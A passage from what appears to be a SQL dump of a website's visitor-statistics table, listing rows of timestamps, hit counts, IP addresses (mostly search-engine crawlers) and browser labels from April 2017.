,2,0,0,'141.8.142.15','other'),(98604,1491542549,2,2,0,0,'141.8.132.43','other'),(98605,1491542778,1,1,0,0,'95.108.213.8','other'),(98606,1491542816,1,1,0,0,'95.108.213.34','other'),(98607,1491542906,1,1,0,0,'178.154.189.3','other'),(98608,1491542982,2,2,0,0,'141.8.142.154','other'),(98609,1491543203,2,2,0,0,'5.255.253.63','other'),(98610,1491543324,1,1,0,0,'141.8.132.39','other'),(98611,1491543428,1,1,0,0,'141.8.142.164','other'),(98612,1491543563,1,1,0,0,'5.255.253.58','other'),(98613,1491543588,1,1,0,0,'37.9.113.38','other'),(98614,1491543599,3,3,0,0,'95.108.179.15','other'),(98615,1491543600,1,1,0,0,'178.154.200.37','other'),(98616,1491543615,4,4,0,0,'95.108.213.7','other'),(98617,1491543775,1,0,1,0,'66.249.76.29',''),(98618,1491543949,1,1,0,0,'66.102.9.29','chrome'),(98619,1491544027,4,4,0,0,'141.8.142.15','other'),(98620,1491544202,1,1,0,0,'91.196.178.38','firefox'),(98621,1491544324,1,1,0,0,'91.196.178.71','firefox'),(98622,1491544540,2,2,0,0,'141.8.142.154','other'),(98623,1491544573,1,1,0,0,'91.209.11.236','other'),(98624,1491544587,1,1,0,0,'95.108.213.7','other'),(98625,1491544618,1,1,0,0,'178.154.200.2','other'),(98626,1491544674,1,1,0,0,'5.255.253.81','other'),(98627,1491544693,2,2,0,0,'141.8.142.38','other'),(98628,1491544718,1,1,0,0,'178.154.200.45','other'),(98629,1491544740,1,0,1,0,'66.249.76.109',''),(98630,1491544753,1,1,0,0,'93.158.152.79','other'),(98631,1491544781,1,1,0,0,'141.8.142.97','other'),(98632,1491544830,1,1,0,0,'37.9.113.38','other'),(98633,1491544875,1,1,0,0,'91.196.178.66','firefox'),(98634,1491544883,1,1,0,0,'51.255.65.48','other'),(98635,1491544902,2,2,0,0,'95.108.213.8','other'),(98636,1491545059,3,3,0,0,'95.108.213.34','other'),(98637,1491545113,2,2,0,0,'5.255.253.63','other'),(98638,1491545239,1,1,0,0,'8.29.198.27','other'),(98639,1491545455,1,1,0,0,'91.196.178.71','chrome'),(98640,1491545599,1,1,0,0,'95.108.179.15','other'),(98641,1491545620,1,1,0,0,'141.8.132.39','other'),(98642,1491545658,4,4,0,0,'141.8.142.15','other'),(98643,1491545848,1,1,0,0,'91.196.178.70','chrome'),(98644,1491545851,1,1,0,0,'91.196.178.71','firefox'),(98645,1491545913,2,2,0,0,'141.8.142.164','other'),(98646,1491545965,4,4,0,0,'95.108.213.34','other'),(98647,1491546017,1,1,0,0,'5.255.253.63','other'),(98648,1491546335,1,1,0,0,'141.8.142.154','other'),(98649,1491546401,2,2,0,0,'141.8.183.1','other'),(98650,1491546566,1,1,0,0,'141.8.142.97','other'),(98651,1491546601,1,1,0,0,'95.108.213.7','other'),(98652,1491546620,2,2,0,0,'37.9.113.38','other'),(98653,1491546697,1,1,0,0,'178.154.200.45','other'),(98654,1491546758,1,1,0,0,'178.154.200.37','other'),(98655,1491546929,1,1,0,0,'37.54.21.126','chrome'),(98656,1491546944,2,2,0,0,'141.8.142.15','other'),(98657,1491546986,1,1,0,0,'141.8.132.43','other'),(98658,1491547096,5,5,0,0,'5.255.253.63','other'),(98659,1491547223,1,1,0,0,'91.196.178.161','chrome'),(98660,1491547252,1,0,1,0,'66.249.76.107',''),(98661,1491547351,1,1,0,0,'37.9.113.43','other'),(98662,1491547484,5,5,0,0,'141.8.142.154','other'),(98663,1491547510,3,3,0,0,'141.8.142.38','other'),(98664,1491547552,2,2,0,0,'95.108.179.15','other'),(98665,1491547650,2,2,0,0,'95.108.213.7','other'),(98666,1491548024,2,2,0,0,'5.255.253.63','other'),(98667,1491548026,1,1,0,0,'164.132.161.75','other'),(98668,1491548035,1,0,1,0,'66.249.76.30',''),(98669,1491548074,1,1,0,0,'51.255.65.90','other'),(98670,1491548143,1,1,0,0,'178.154.200.45','other'),(98671,1491548183,4,4,0,0,'141.8.142.164','other'),(98672,1491548233,2,2,0,0,'141.8.142.15','other'),(98673,1491548352,1,1,0,0,'37.9.113.43','other'),(98674,1491548357,1,1,0,0,'164.132.161.10','other'),(98675,1491548417,1,1,0,0,'5.255.253.81','other'),(98676,1491548600,1,1,0,0,'178.154.200.37','other'),(98677,1491548656,1,1,0,0,'37.9.113.38','other'),(98678,1491548721,1,1,0,0,'95.108.179.8','other'),(98679,1491548730,1,1,0,0,'130.180.220.198','firefox'),(98680,1491548769,2,2,0,0,'95.108.179.15','other'),(98681,1491548806,1,1,0,0,'93.170.32.44','chrome'),(98682,1491548837,1,1,0,0,'5.255.253.43','other'),(98683,1491548888,1,1,0,0,'141.8.132.25','other'),(98684,1491548923,1,1,0,0,'37.53.224.5','chrome'),(98685,1491549010,4,4,0,0,'141.8.142.154','other'),(98686,1491549116,2,2,0,0,'95.108.213.34','other'),(98687,1491549153,6,6,0,0,'141.8.142.164','other'),(98688,1491549317,7,7,0,0,'5.255.253.63','other'),(98689,1491549867,3,3,0,0,'95.108.179.15','other'),(98690,1491549972,1,1,0,0,'141.8.142.154','other'),(98691,1491550063,1,1,0,0,'141.8.142.164','other'),(98692,1491550166,2,2,0,0,'95.108.213.34','other'),(98693,1491550876,32,32,0,0,'136.243.152.18','other'),(98694,1491551081,1,1,0,0,'164.132.161.82','other'),(98695,1491551428,1,1,0,0,'91.196.178.169','chrome'),(98696,1491551611,4,4,0,0,'141.8.142.164','other'),(98697,1491551682,1,1,0,0,'141.8.142.15','other'),(98698,1491551790,3,3,0,0,'141.8.142.154','other'),(98699,1491551835,3,3,0,0,'95.108.213.34','other'),(98700,1491551954,1,1,0,0,'95.108.179.15','other'),(98701,1491552018,1,1,0,0,'5.255.253.81','other'),(98702,1491552049,2,2,0,0,'5.255.253.63','other'),(98703,1491552099,1,1,0,0,'91.196.178.136','firefox'),(98704,1491552283,1,1,0,0,'40.77.167.121','other'),(98705,1491552635,1,1,0,0,'91.196.178.66','chrome'),(98706,1491552657,1,1,0,0,'82.207.91.234','firefox'),(98707,1491553108,1,1,0,0,'164.132.161.72','other'),(98708,1491553174,1,1,0,0,'216.244.66.237','other'),(98709,1491553277,1,1,0,0,'178.92.171.107','chrome'),(98710,1491553473,1,1,0,0,'51.255.65.26','other'),(98711,1491553805,1,1,0,0,'91.196.178.66','firefox'),(98712,1491554846,1,1,0,0,'178.92.72.27','chrome'),(98713,1491555629,2,2,0,0,'91.196.178.38','chrome'),(98714,1491555780,1,1,0,0,'46.201.183.149','firefox'),(98715,1491555793,1,1,0,0,'164.132.161.75','other'),(98716,1491555866,1,0,1,0,'66.249.76.29',''),(98717,1491556069,1,1,0,0,'8.29.198.26','other'),(98718,1491556600,1,1,0,0,'51.255.65.91','other'),(98719,1491556750,1,0,1,0,'66.249.66.84',''),(98720,1491557295,1,1,0,0,'51.255.65.63','other'),(98721,1491557476,1,1,0,0,'91.196.178.68','firefox'),(98722,1491557527,1,1,0,0,'164.132.161.60','other'),(98723,1491557798,1,0,1,0,'66.249.76.108',''),(98724,1491558343,1,1,0,0,'51.255.65.58','other'),(98725,1491559071,1,1,0,0,'91.196.178.70','firefox'),(98726,1491559687,1,1,0,0,'66.249.76.28','chrome'),(98727,1491559699,1,1,0,0,'66.249.76.109','chrome'),(98728,1491560164,1,1,0,0,'51.255.65.4','other'),(98729,1491560476,1,1,0,0,'164.132.161.45','other'),(98730,1491560961,1,1,0,0,'180.76.15.22','other'),(98731,1491561373,1,1,0,0,'62.80.170.26','other'),(98732,1491561510,1,0,1,0,'40.77.167.120',''),(98733,1491563329,1,0,1,0,'66.249.76.108',''),(98734,1491563528,1,1,0,0,'91.196.178.161','chrome'),(98735,1491563905,1,1,0,0,'95.132.117.44','firefox'),(98736,1491565182,1,1,0,0,'157.55.39.5','other'),(98737,1491565641,1,1,0,0,'51.255.65.87','other'),(98738,1491566060,1,1,0,0,'46.219.247.100','chrome'),(98739,1491566439,1,1,0,0,'163.172.64.192','other'),(98740,1491566461,1,0,1,0,'40.77.167.122',''),(98741,1491566602,1,1,0,0,'212.113.43.67','chrome'),(98742,1491566637,1,1,0,0,'91.196.177.15','chrome'),(98743,1491566896,1,1,0,0,'8.29.198.26','other'),(98744,1491566955,1,1,0,0,'178.93.204.47','chrome'),(98745,1491567406,1,1,0,0,'163.172.64.182','other'),(98746,1491567475,1,1,0,0,'194.44.144.18','chrome'),(98747,1491567768,1,1,0,0,'216.244.66.237','other'),(98748,1491567859,1,1,0,0,'46.219.247.100','chrome'),(98749,1491568464,1,1,0,0,'164.132.161.82','other'),(98750,1491569660,1,1,0,0,'46.219.247.100','chrome'),(98751,1491569934,1,1,0,0,'164.132.161.58','other'),(98752,1491570013,1,1,0,0,'94.153.201.226','chrome'),(98753,1491571460,1,1,0,0,'46.219.247.100','chrome'),(98754,1491571621,1,1,0,0,'51.255.65.46','other'),(98755,1491571831,1,1,0,0,'163.172.71.55','other'),(98756,1491572420,1,1,0,0,'51.255.65.66','other'),(98757,1491572836,1,1,0,0,'164.132.161.85','other'),(98758,1491573315,1,1,0,0,'180.76.15.27','other'),(98759,1491573871,1,1,0,0,'164.132.161.4','other'),(98760,1491574160,1,1,0,0,'46.219.247.100','chrome'),(98761,1491574261,1,1,0,0,'91.196.178.35','chrome'),(98762,1491574456,1,1,0,0,'77.120.93.21','chrome'),(98763,1491574742,1,1,0,0,'51.255.65.51','other'),(98764,1491574808,1,1,0,0,'163.172.64.225','other'),(98765,1491575027,1,1,0,0,'91.209.11.236','other'),(98766,1491575076,1,1,0,0,'66.249.93.202','chrome'),(98767,1491575092,1,1,0,0,'82.207.31.170','firefox'),(98768,1491575130,1,1,0,0,'141.8.142.15','other'),(98769,1491575509,1,1,0,0,'164.132.161.24','other'),(98770,1491575963,1,1,0,0,'46.219.247.100','chrome'),(98771,1491576331,2,2,0,0,'216.244.66.237','other'),(98772,1491576723,1,1,0,0,'164.132.161.35','other'),(98773,1491577221,1,0,1,0,'66.249.76.108',''),(98774,1491577740,1,1,0,0,'8.29.198.26','other'),(98775,1491577760,1,1,0,0,'46.219.247.100','chrome'),(98776,1491578030,1,0,1,0,'66.249.76.30',''),(98777,1491578194,1,1,0,0,'163.172.64.239','other'),(98778,1491578754,1,1,0,0,'95.108.213.7','other'),(98779,1491579161,1,1,0,0,'180.76.15.154','other'),(98780,1491579560,1,1,0,0,'46.219.247.100','chrome'),(98781,1491579642,1,0,1,0,'66.249.76.108',''),(98782,1491580059,1,1,0,0,'164.132.161.31','other'),(98783,1491580270,1,1,0,0,'51.255.65.40','other'),(98784,1491580647,1,1,0,0,'46.211.155.27','chrome'),(98785,1491580707,1,1,0,0,'188.255.17.72','msie'),(98786,1491580922,1,1,0,0,'54.244.48.54','msie'),(98787,1491581082,1,1,0,0,'216.244.66.237','other'),(98788,1491581360,1,1,0,0,'46.219.247.100','chrome'),(98789,1491581606,1,1,0,0,'193.194.127.217','firefox'),(98790,1491582637,1,1,0,0,'51.255.65.41','other'),(98791,1491583160,1,1,0,0,'46.219.247.100','chrome'),(98792,1491583555,1,0,1,0,'66.249.66.183',''),(98793,1491583695,1,0,1,0,'66.249.76.108',''),(98794,1491583861,1,1,0,0,'77.37.222.252','msie'),(98795,1491584270,1,1,0,0,'128.69.152.23','msie'),(98796,1491584516,1,1,0,0,'216.244.66.237','other'),(98797,1491584751,1,1,0,0,'91.196.178.71','chrome'),(98798,1491584960,1,1,0,0,'46.219.247.100','chrome'),(98799,1491585099,1,1,0,0,'51.255.65.79','other'),(98800,1491585559,1,1,0,0,'51.255.65.32','other'),(98801,1491585852,1,1,0,0,'163.172.64.237','other'),(98802,1491586203,1,0,1,0,'157.55.39.153',''),(98803,1491586498,1,1,0,0,'91.196.178.166','chrome'),(98804,1491586760,1,1,0,0,'46.219.247.100','chrome'),(98805,1491586939,1,1,0,0,'164.132.161.16','other'),(98806,1491587211,1,1,0,0,'51.15.10.29','chrome'),(98807,1491587375,1,1,0,0,'66.249.76.109','chrome'),(98808,1491587817,1,1,0,0,'91.196.178.72','opera'),(98809,1491588190,1,1,0,0,'91.209.11.236','other'),(98810,1491588572,1,1,0,0,'8.29.198.26','other'),(98811,1491588852,1,1,0,0,'163.172.71.13','other'),(98812,1491589102,1,1,0,0,'51.255.65.94','other'),(98813,1491589722,1,1,0,0,'217.27.157.162','chrome'),(98814,1491590185,1,1,0,0,'82.145.222.33','other'),(98815,1491590235,2,2,0,0,'89.238.188.121','other'),(98816,1491590252,1,1,0,0,'82.145.222.33','chrome'),(98817,1491590254,1,1,0,0,'82.145.222.33','opera'),(98818,1491590915,1,1,0,0,'164.132.161.14','other'),(98819,1491591655,1,0,1,0,'207.46.13.186',''),(98820,1491591832,1,1,0,0,'31.43.38.169','chrome'),(98821,1491592137,1,1,0,0,'51.255.65.29','other'),(98822,1491594036,1,1,0,0,'37.115.88.180','chrome'),(98823,1491594721,1,1,0,0,'195.3.158.146','chrome'),(98824,1491595667,1,1,0,0,'51.255.65.66','other'),(98825,1491595701,1,0,1,0,'157.55.39.241',''),(98826,1491595967,1,0,1,0,'66.249.76.109',''),(98827,1491596856,1,1,0,0,'178.154.200.2','other'),(98828,1491597246,1,1,0,0,'164.132.161.58','other'),(98829,1491598144,1,1,0,0,'51.255.65.39','other'),(98830,1491598642,1,1,0,0,'51.255.65.45','other'),(98831,1491599246,6,6,0,0,'5.9.156.43','other'),(98832,1491599394,1,1,0,0,'8.29.198.27','other'),(98833,1491599943,1,1,0,0,'164.132.161.38','other'),(98834,1491600594,1,1,0,0,'163.172.64.223','other'),(98835,1491601449,1,0,1,0,'157.55.39.153',''),(98836,1491601517,1,1,0,0,'163.172.64.242','other'),(98837,1491602431,1,0,1,0,'66.249.66.87',''),(98838,1491603092,1,1,0,0,'95.108.213.34','other'),(98839,1491603640,1,1,0,0,'164.132.161.37','other'),(98840,1491603901,1,1,0,0,'51.255.65.31','other'),(98841,1491605285,1,1,0,0,'163.172.64.244','other'),(98842,1491605998,1,1,0,0,'163.172.64.245','other'),(98843,1491606713,2,0,2,0,'40.77.167.107',''),(98844,1491606792,1,0,1,0,'66.249.76.28',''),(98845,1491607437,1,1,0,0,'180.76.15.154','other'),(98846,1491607660,2,0,2,0,'66.249.76.108',''),(98847,1491608619,1,1,0,0,'46.201.47.12','chrome'),(98848,1491608994,1,1,0,0,'66.249.76.109','chrome'),(98849,1491609418,1,1,0,0,'216.244.66.237','other'),(98850,1491610220,1,1,0,0,'8.29.198.27','other'),(98851,1491610542,1,1,0,0,'66.102.9.27','chrome'),(98852,1491610967,1,1,0,0,'216.244.66.237','other'),(98853,1491611451,1,1,0,0,'164.132.161.75','other'),(98854,1491611568,1,1,0,0,'51.255.65.43','other'),(98855,1491612401,1,1,0,0,'51.255.65.8','other'),(98856,1491612595,1,1,0,0,'66.249.76.108','chrome'),(98857,1491613291,1,1,0,0,'51.15.10.29','chrome'),(98858,1491614498,1,1,0,0,'216.244.66.237','other'),(98859,1491614664,1,1,0,0,'164.132.161.75','other'),(98860,1491614702,1,1,0,0,'164.132.161.15','other'),(98861,1491614952,1,1,0,0,'164.132.161.86','other'),(98862,1491616499,1,1,0,0,'164.132.161.29','other'),(98863,1491616555,2,2,0,0,'52.86.176.3','other'),(98864,1491617864,1,0,1,0,'157.55.39.18',''),(98865,1491617932,1,1,0,0,'51.255.65.39','other'),(98866,1491618697,1,1,0,0,'95.108.213.34','other'),(98867,1491619262,1,0,1,0,'40.77.167.101',''),(98868,1491620444,1,1,0,0,'51.255.65.48','other'),(98869,1491620459,1,1,0,0,'40.77.167.133','other'),(98870,1491621050,1,1,0,0,'8.29.198.25','other'),(98871,1491621503,1,0,1,0,'157.55.39.3',''),(98872,1491621950,1,1,0,0,'51.255.65.93','other'),(98873,1491622055,1,0,1,0,'66.249.76.107',''),(98874,1491622064,1,1,0,0,'141.0.13.61','other'),(98875,1491622663,1,0,1,0,'66.249.76.29',''),(98876,1491623478,1,1,0,0,'164.132.161.21','other'),(98877,1491623803,1,1,0,0,'216.244.66.237','other'),(98878,1491623881,1,1,0,0,'164.132.161.16','other'),(98879,1491624363,1,1,0,0,'164.132.161.9','other'),(98880,1491624742,1,1,0,0,'141.8.142.15','other'),(98881,1491625115,1,1,0,0,'51.255.65.66','other'),(98882,1491625336,1,1,0,0,'141.8.132.25','other'),(98883,1491625630,1,1,0,0,'216.244.66.237','other'),(98884,1491625853,1,1,0,0,'164.132.161.15','other'),(98885,1491627614,1,0,1,0,'66.249.66.177',''),(98886,1491628015,1,1,0,0,'164.132.161.75','other'),(98887,1491628448,1,1,0,0,'164.132.161.49','other'),(98888,1491628785,1,1,0,0,'216.244.66.237','other'),(98889,1491629459,1,1,0,0,'52.86.176.3','other'),(98890,1491629663,1,1,0,0,'164.132.161.4','other'),(98891,1491629969,2,2,0,0,'51.255.65.86','other'),(98892,1491631610,1,0,1,0,'66.249.66.180',''),(98893,1491631678,1,1,0,0,'91.196.178.36','chrome'),(98894,1491631892,1,1,0,0,'8.29.198.27','other'),(98895,1491632610,1,1,0,0,'40.77.167.55','other'),(98896,1491633364,1,1,0,0,'163.172.64.185','other'),(98897,1491633811,1,1,0,0,'93.73.71.52','chrome'),(98898,1491634366,1,1,0,0,'163.172.64.241','other'),(98899,1491634418,1,1,0,0,'91.196.178.36','chrome'),(98900,1491634769,1,1,0,0,'164.132.161.41','other'),(98901,1491635071,1,1,0,0,'208.43.225.85','other'),(98902,1491635342,1,1,0,0,'180.76.15.27','other'),(98903,1491635497,1,1,0,0,'51.255.65.2','other'),(98904,1491635832,1,0,1,0,'66.249.76.28',''),(98905,1491636389,1,1,0,0,'51.255.65.37','other'),(98906,1491636913,1,1,0,0,'51.255.65.12','other'),(98907,1491637302,1,1,0,0,'216.244.66.237','other'),(98908,1491637366,1,1,0,0,'164.132.161.90','other'),(98909,1491637590,1,1,0,0,'46.211.200.134','other'),(98910,1491637611,1,1,0,0,'51.255.65.29','other'),(98911,1491637713,1,1,0,0,'40.77.167.55','other'),(98912,1491638809,65,65,0,0,'88.99.195.39','other'),(98913,1491639050,1,1,0,0,'163.172.68.118','other'),(98914,1491639069,1,0,1,0,'66.249.66.177',''),(98915,1491639900,1,1,0,0,'51.255.65.13','other'),(98916,1491640858,1,1,0,0,'51.255.65.95','other'),(98917,1491640940,1,1,0,0,'31.43.22.165','chrome'),(98918,1491641113,1,1,0,0,'216.244.66.237','other'),(98919,1491641906,1,0,1,0,'40.77.167.101',''),(98920,1491642078,1,1,0,0,'164.132.161.5','other'),(98921,1491642741,1,1,0,0,'8.29.198.26','other'),(98922,1491643158,2,2,0,0,'95.213.141.126','opera'),(98923,1491644915,1,1,0,0,'51.255.65.62','other'),(98924,1491645337,1,1,0,0,'40.77.167.55','other'),(98925,1491646826,1,1,0,0,'163.172.64.238','other'),(98926,1491646944,2,2,0,0,'216.244.66.237','other'),(98927,1491646999,1,0,1,0,'66.249.76.29',''),(98928,1491647447,1,1,0,0,'66.249.76.108','chrome'),(98929,1491647469,1,1,0,0,'66.249.66.84','chrome'),(98930,1491647983,1,1,0,0,'40.77.167.108','other'),(98931,1491648116,1,0,1,0,'66.249.66.180',''),(98932,1491649793,1,0,1,0,'40.77.167.30',''),(98933,1491650194,1,1,0,0,'51.255.65.24','other'),(98934,1491650958,1,1,0,0,'178.154.200.37','other'),(98935,1491651032,1,1,0,0,'141.8.142.15','other'),(98936,1491651259,1,1,0,0,'163.172.64.216','other'),(98937,1491651399,1,1,0,0,'164.132.161.12','other'),(98938,1491652610,4,4,0,0,'46.229.168.75','other'),(98939,1491652638,4,4,0,0,'46.229.168.73','other'),(98940,1491652652,2,2,0,0,'46.229.168.72','other'),(98941,1491652668,4,4,0,0,'46.229.168.69','other'),(98942,1491652694,6,6,0,0,'46.229.168.71','other'),(98943,1491652754,1,1,0,0,'46.229.168.67','other'),(98944,1491652798,3,3,0,0,'46.229.168.66','other'),(98945,1491652823,3,3,0,0,'46.229.168.70','other'),(98946,1491652919,2,2,0,0,'46.229.168.74','other'),(98947,1491652961,1,1,0,0,'46.229.168.65','other'),(98948,1491653585,1,1,0,0,'8.29.198.27','other'),(98949,1491653588,1,1,0,0,'164.132.161.37','other'),(98950,1491654311,1,1,0,0,'163.172.69.178','other'),(98951,1491654400,1,1,0,0,'51.255.65.22','other'),(98952,1491654609,1,1,0,0,'216.244.66.237','other'),(98953,1491655440,1,1,0,0,'51.255.65.17','other'),(98954,1491657184,1,1,0,0,'51.255.65.67','other'),(98955,1491657244,1,1,0,0,'216.244.66.237','other'),(98956,1491657284,3,3,0,0,'173.234.153.122','other'),(98957,1491657650,1,0,1,0,'66.249.76.28',''),(98958,1491659123,1,1,0,0,'91.209.11.236','other'),(98959,1491659254,1,0,1,0,'157.55.39.66',''),(98960,1491659438,1,1,0,0,'95.108.213.34','other'),(98961,1491660615,1,1,0,0,'216.244.66.237','other'),(98962,1491661325,1,1,0,0,'95.108.213.34','other'),(98963,1491661329,2,2,0,0,'95.108.179.15','other'),(98964,1491662474,1,1,0,0,'91.209.11.236','other'),(98965,1491662998,1,1,0,0,'51.255.65.48','other'),(98966,1491663134,1,1,0,0,'37.53.226.144','chrome'),(98967,1491664415,1,1,0,0,'8.29.198.27','other'),(98968,1491664559,1,1,0,0,'91.196.178.65','chrome'),(98969,1491664751,1,1,0,0,'216.244.66.237','other'),(98970,1491665786,1,1,0,0,'163.172.64.184','other'),(98971,1491666465,1,1,0,0,'163.172.71.13','other'),(98972,1491667047,1,1,0,0,'178.154.189.3','other'),(98973,1491667059,1,0,1,0,'66.249.76.109',''),(98974,1491667178,1,0,1,0,'66.249.76.30',''),(98975,1491667262,1,1,0,0,'51.255.65.94','other'),(98976,1491667776,1,1,0,0,'193.194.127.217','firefox'),(98977,1491668049,5,5,0,0,'51.255.47.77','other'),(98978,1491668798,1,1,0,0,'195.114.136.51','chrome'),(98979,1491669146,1,1,0,0,'163.172.64.246','other'),(98980,1491669919,1,1,0,0,'141.8.142.38','other'),(98981,1491669932,1,1,0,0,'141.8.132.39','other'),(98982,1491669934,1,1,0,0,'51.255.65.15','other'),(98983,1491669947,1,1,0,0,'141.8.142.4','other'),(98984,1491669949,1,1,0,0,'141.8.132.50','other'),(98985,1491669962,1,0,1,0,'66.249.66.180',''),(98986,1491671887,1,1,0,0,'95.134.220.6','chrome'),(98987,1491672259,1,1,0,0,'92.113.175.166','firefox'),(98988,1491672432,1,1,0,0,'95.108.213.34','other'),(98989,1491672697,1,1,0,0,'141.8.142.15','other'),(98990,1491672741,1,1,0,0,'176.193.178.108','msie'),(98991,1491672838,1,1,0,0,'91.196.177.9','chrome'),(98992,1491672928,1,0,1,0,'66.249.66.183',''),(98993,1491673065,1,1,0,0,'46.219.247.100','chrome'),(98994,1491673251,1,1,0,0,'163.172.64.241','other'),(98995,1491673559,1,1,0,0,'40.77.167.59','other'),(98996,1491673566,7,7,0,0,'95.108.213.34','other'),(98997,1491673570,1,1,0,0,'178.154.200.41','other'),(98998,1491673586,7,7,0,0,'95.108.213.7','other'),(98999,1491673587,12,12,0,0,'141.8.142.154','other'),(99000,1491673619,1,1,0,0,'176.192.202.100','msie'),(99001,1491673726,1,1,0,0,'164.132.161.85','other'),(99002,1491673794,1,1,0,0,'141.8.132.72','other'),(99003,1491674218,13,13,0,0,'95.108.179.15','other'),(99004,1491674231,11,11,0,0,'178.154.200.37','other'),(99005,1491674237,16,16,0,0,'141.8.142.164','other'),(99006,1491674279,1,1,0,0,'95.108.213.8','other'),(99007,1491674293,20,20,0,0,'141.8.142.15','other'),(99008,1491674301,2,2,0,0,'93.158.152.79','other'),(99009,1491674326,11,11,0,0,'5.255.253.63','other'),(99010,1491674410,3,3,0,0,'141.8.142.38','other'),(99011,1491674472,7,7,0,0,'95.108.213.34','other'),(99012,1491674489,10,10,0,0,'141.8.142.154','other'),(99013,1491674504,1,1,0,0,'141.8.142.97','other'),(99014,1491674506,1,1,0,0,'178.154.200.45','other'),(99015,1491674513,7,7,0,0,'95.108.213.7','other'),(99016,1491674540,1,1,0,0,'5.255.253.58','other'),(99017,1491674864,1,1,0,0,'46.219.247.100','chrome'),(99018,1491674865,1,1,0,0,'46.200.126.33','chrome'),(99019,1491675245,1,1,0,0,'8.29.198.27','other'),(99020,1491675522,1,1,0,0,'91.196.178.167','chrome'),(99021,1491675568,1,1,0,0,'164.132.161.95','other'),(99022,1491675847,1,1,0,0,'176.195.109.76','msie'),(99023,1491676092,1,1,0,0,'188.32.223.251','msie'),(99024,1491676637,1,1,0,0,'164.132.161.89','other'),(99025,1491676665,1,1,0,0,'46.219.247.100','chrome'),(99026,1491676858,1,1,0,0,'51.255.65.67','other'),(99027,1491678222,1,1,0,0,'51.255.65.86','other'),(99028,1491678333,1,1,0,0,'66.102.9.38','chrome'),(99029,1491678465,1,1,0,0,'46.219.247.100','chrome'),(99030,1491678546,1,1,0,0,'164.132.161.96','other'),(99031,1491678594,1,1,0,0,'164.132.161.86','other'),(99032,1491679218,1,1,0,0,'51.255.65.85','other'),(99033,1491679302,1,1,0,0,'163.172.64.184','other'),(99034,1491680265,1,1,0,0,'46.219.247.100','chrome'),(99035,1491680690,1,1,0,0,'163.172.64.185','other'),(99036,1491682065,1,1,0,0,'46.219.247.100','chrome'),(99037,1491683007,1,1,0,0,'141.8.142.154','other'),(99038,1491683690,1,1,0,0,'176.193.178.108','msie'),(99039,1491683865,1,1,0,0,'46.219.247.100','chrome'),(99040,1491683925,1,1,0,0,'176.192.202.100','msie'),(99041,1491684538,1,1,0,0,'163.172.64.217','other'),(99042,1491684632,1,1,0,0,'164.132.161.26','other'),(99043,1491684939,1,1,0,0,'93.80.148.251','msie'),(99044,1491684974,1,1,0,0,'163.172.68.136','other'),(99045,1491685078,1,1,0,0,'217.114.229.169','msie'),(99046,1491685667,1,1,0,0,'46.219.247.100','chrome'),(99047,1491686075,1,1,0,0,'8.29.198.27','other'),(99048,1491686357,1,0,1,0,'66.249.76.107',''),(99049,1491687465,1,1,0,0,'46.219.247.100','chrome'),(99050,1491688190,1,1,0,0,'163.172.64.246','other'),(99051,1491688283,1,1,0,0,'51.255.65.82','other'),(99052,1491688330,1,1,0,0,'51.255.65.64','other'),(99053,1491688609,1,0,1,0,'66.249.76.28',''),(99054,1491688766,1,0,1,0,'66.249.66.180',''),(99055,1491688887,1,0,1,0,'66.249.76.108',''),(99056,1491689265,1,1,0,0,'46.219.247.100','chrome'),(99057,1491689340,1,0,1,0,'66.249.76.30',''),(99058,1491689682,1,1,0,0,'51.255.65.23','other'),(99059,1491690124,1,0,1,0,'66.249.76.109',''),(99060,1491690328,2,0,2,0,'66.249.66.87',''),(99061,1491690661,1,1,0,0,'164.132.161.60','other'),(99062,1491690702,1,0,1,0,'66.249.76.30',''),(99063,1491690788,1,1,0,0,'216.244.66.237','other'),(99064,1491690942,1,0,1,0,'66.249.66.84',''),(99065,1491691065,1,1,0,0,'46.219.247.100','chrome'),(99066,1491691429,1,0,1,0,'66.249.76.107',''),(99067,1491691472,1,0,1,0,'66.249.76.28',''),(99068,1491691516,1,1,0,0,'66.249.76.107','chrome'),(99069,1491691568,1,1,0,0,'66.249.66.177','chrome'),(99070,1491691877,1,1,0,0,'176.193.178.108','msie'),(99071,1491692637,1,1,0,0,'176.192.202.100','msie'),(99072,1491692865,1,1,0,0,'46.219.247.100','chrome'),(99073,1491693107,1,1,0,0,'51.255.65.91','other'),(99074,1491693858,1,1,0,0,'37.112.225.161','msie'),(99075,1491694006,1,1,0,0,'163.172.64.189','other'),(99076,1491694187,1,1,0,0,'176.195.109.76','msie'),(99077,1491694464,1,1,0,0,'163.172.64.234','other'),(99078,1491694469,1,1,0,0,'164.132.161.89','other'),(99079,1491694665,1,1,0,0,'46.219.247.100','chrome'),(99080,1491694814,1,1,0,0,'164.132.161.14','other'),(99081,1491696153,1,1,0,0,'51.255.65.35','other'),(99082,1491696465,1,1,0,0,'46.219.247.100','chrome'),(99083,1491696678,1,1,0,0,'163.172.64.183','other'),(99084,1491696703,1,0,1,0,'66.249.66.84',''),(99085,1491696911,1,1,0,0,'8.29.198.27','other'),(99086,1491697550,1,1,0,0,'66.249.66.84','chrome'),(99087,1491698220,1,1,0,0,'51.255.65.60','other'),(99088,1491698265,1,1,0,0,'46.219.247.100','chrome'),(99089,1491698670,66,2,64,0,'74.91.17.178',''),(99090,1491699583,64,0,64,0,'74.91.17.178',''),(99091,1491699655,1,1,0,0,'163.172.64.225','other'),(99092,1491699720,1,0,1,0,'66.249.66.81',''),(99093,1491699874,1,1,0,0,'163.172.71.55','other'),(99094,1491699951,1,1,0,0,'51.255.65.20','other'),(99095,1491700065,1,1,0,0,'46.219.247.100','chrome'),(99096,1491700179,1,1,0,0,'208.43.225.84','other'),(99097,1491700493,16,0,16,0,'74.91.17.178',''),(99098,1491700706,71,71,0,0,'74.91.17.178','msie'),(99099,1491700753,1,1,0,0,'164.132.161.81','other'),(99100,1491701019,1,1,0,0,'128.72.156.132','msie'),(99101,1491701094,5,5,0,0,'74.91.17.178','firefox'),(99102,1491701271,1,1,0,0,'164.132.161.96','other'),(99103,1491701865,1,1,0,0,'46.219.247.100','chrome'),(99104,1491701989,1,1,0,0,'176.192.202.100','msie'),(99105,1491702152,1,0,1,0,'40.77.167.68',''),(99106,1491702417,1,1,0,0,'164.132.161.84','other'),(99107,1491702637,1,0,1,0,'66.249.76.28',''),(99108,1491703116,1,1,0,0,'163.172.64.253','other'),(99109,1491703150,1,1,0,0,'95.31.182.52','msie'),(99110,1491703295,1,1,0,0,'213.191.17.34','msie'),(99111,1491703665,1,1,0,0,'46.219.247.100','chrome'),(99112,1491703815,1,0,1,0,'66.249.76.29',''),(99113,1491704394,1,1,0,0,'51.255.65.37','other'),(99114,1491704522,1,1,0,0,'164.132.161.8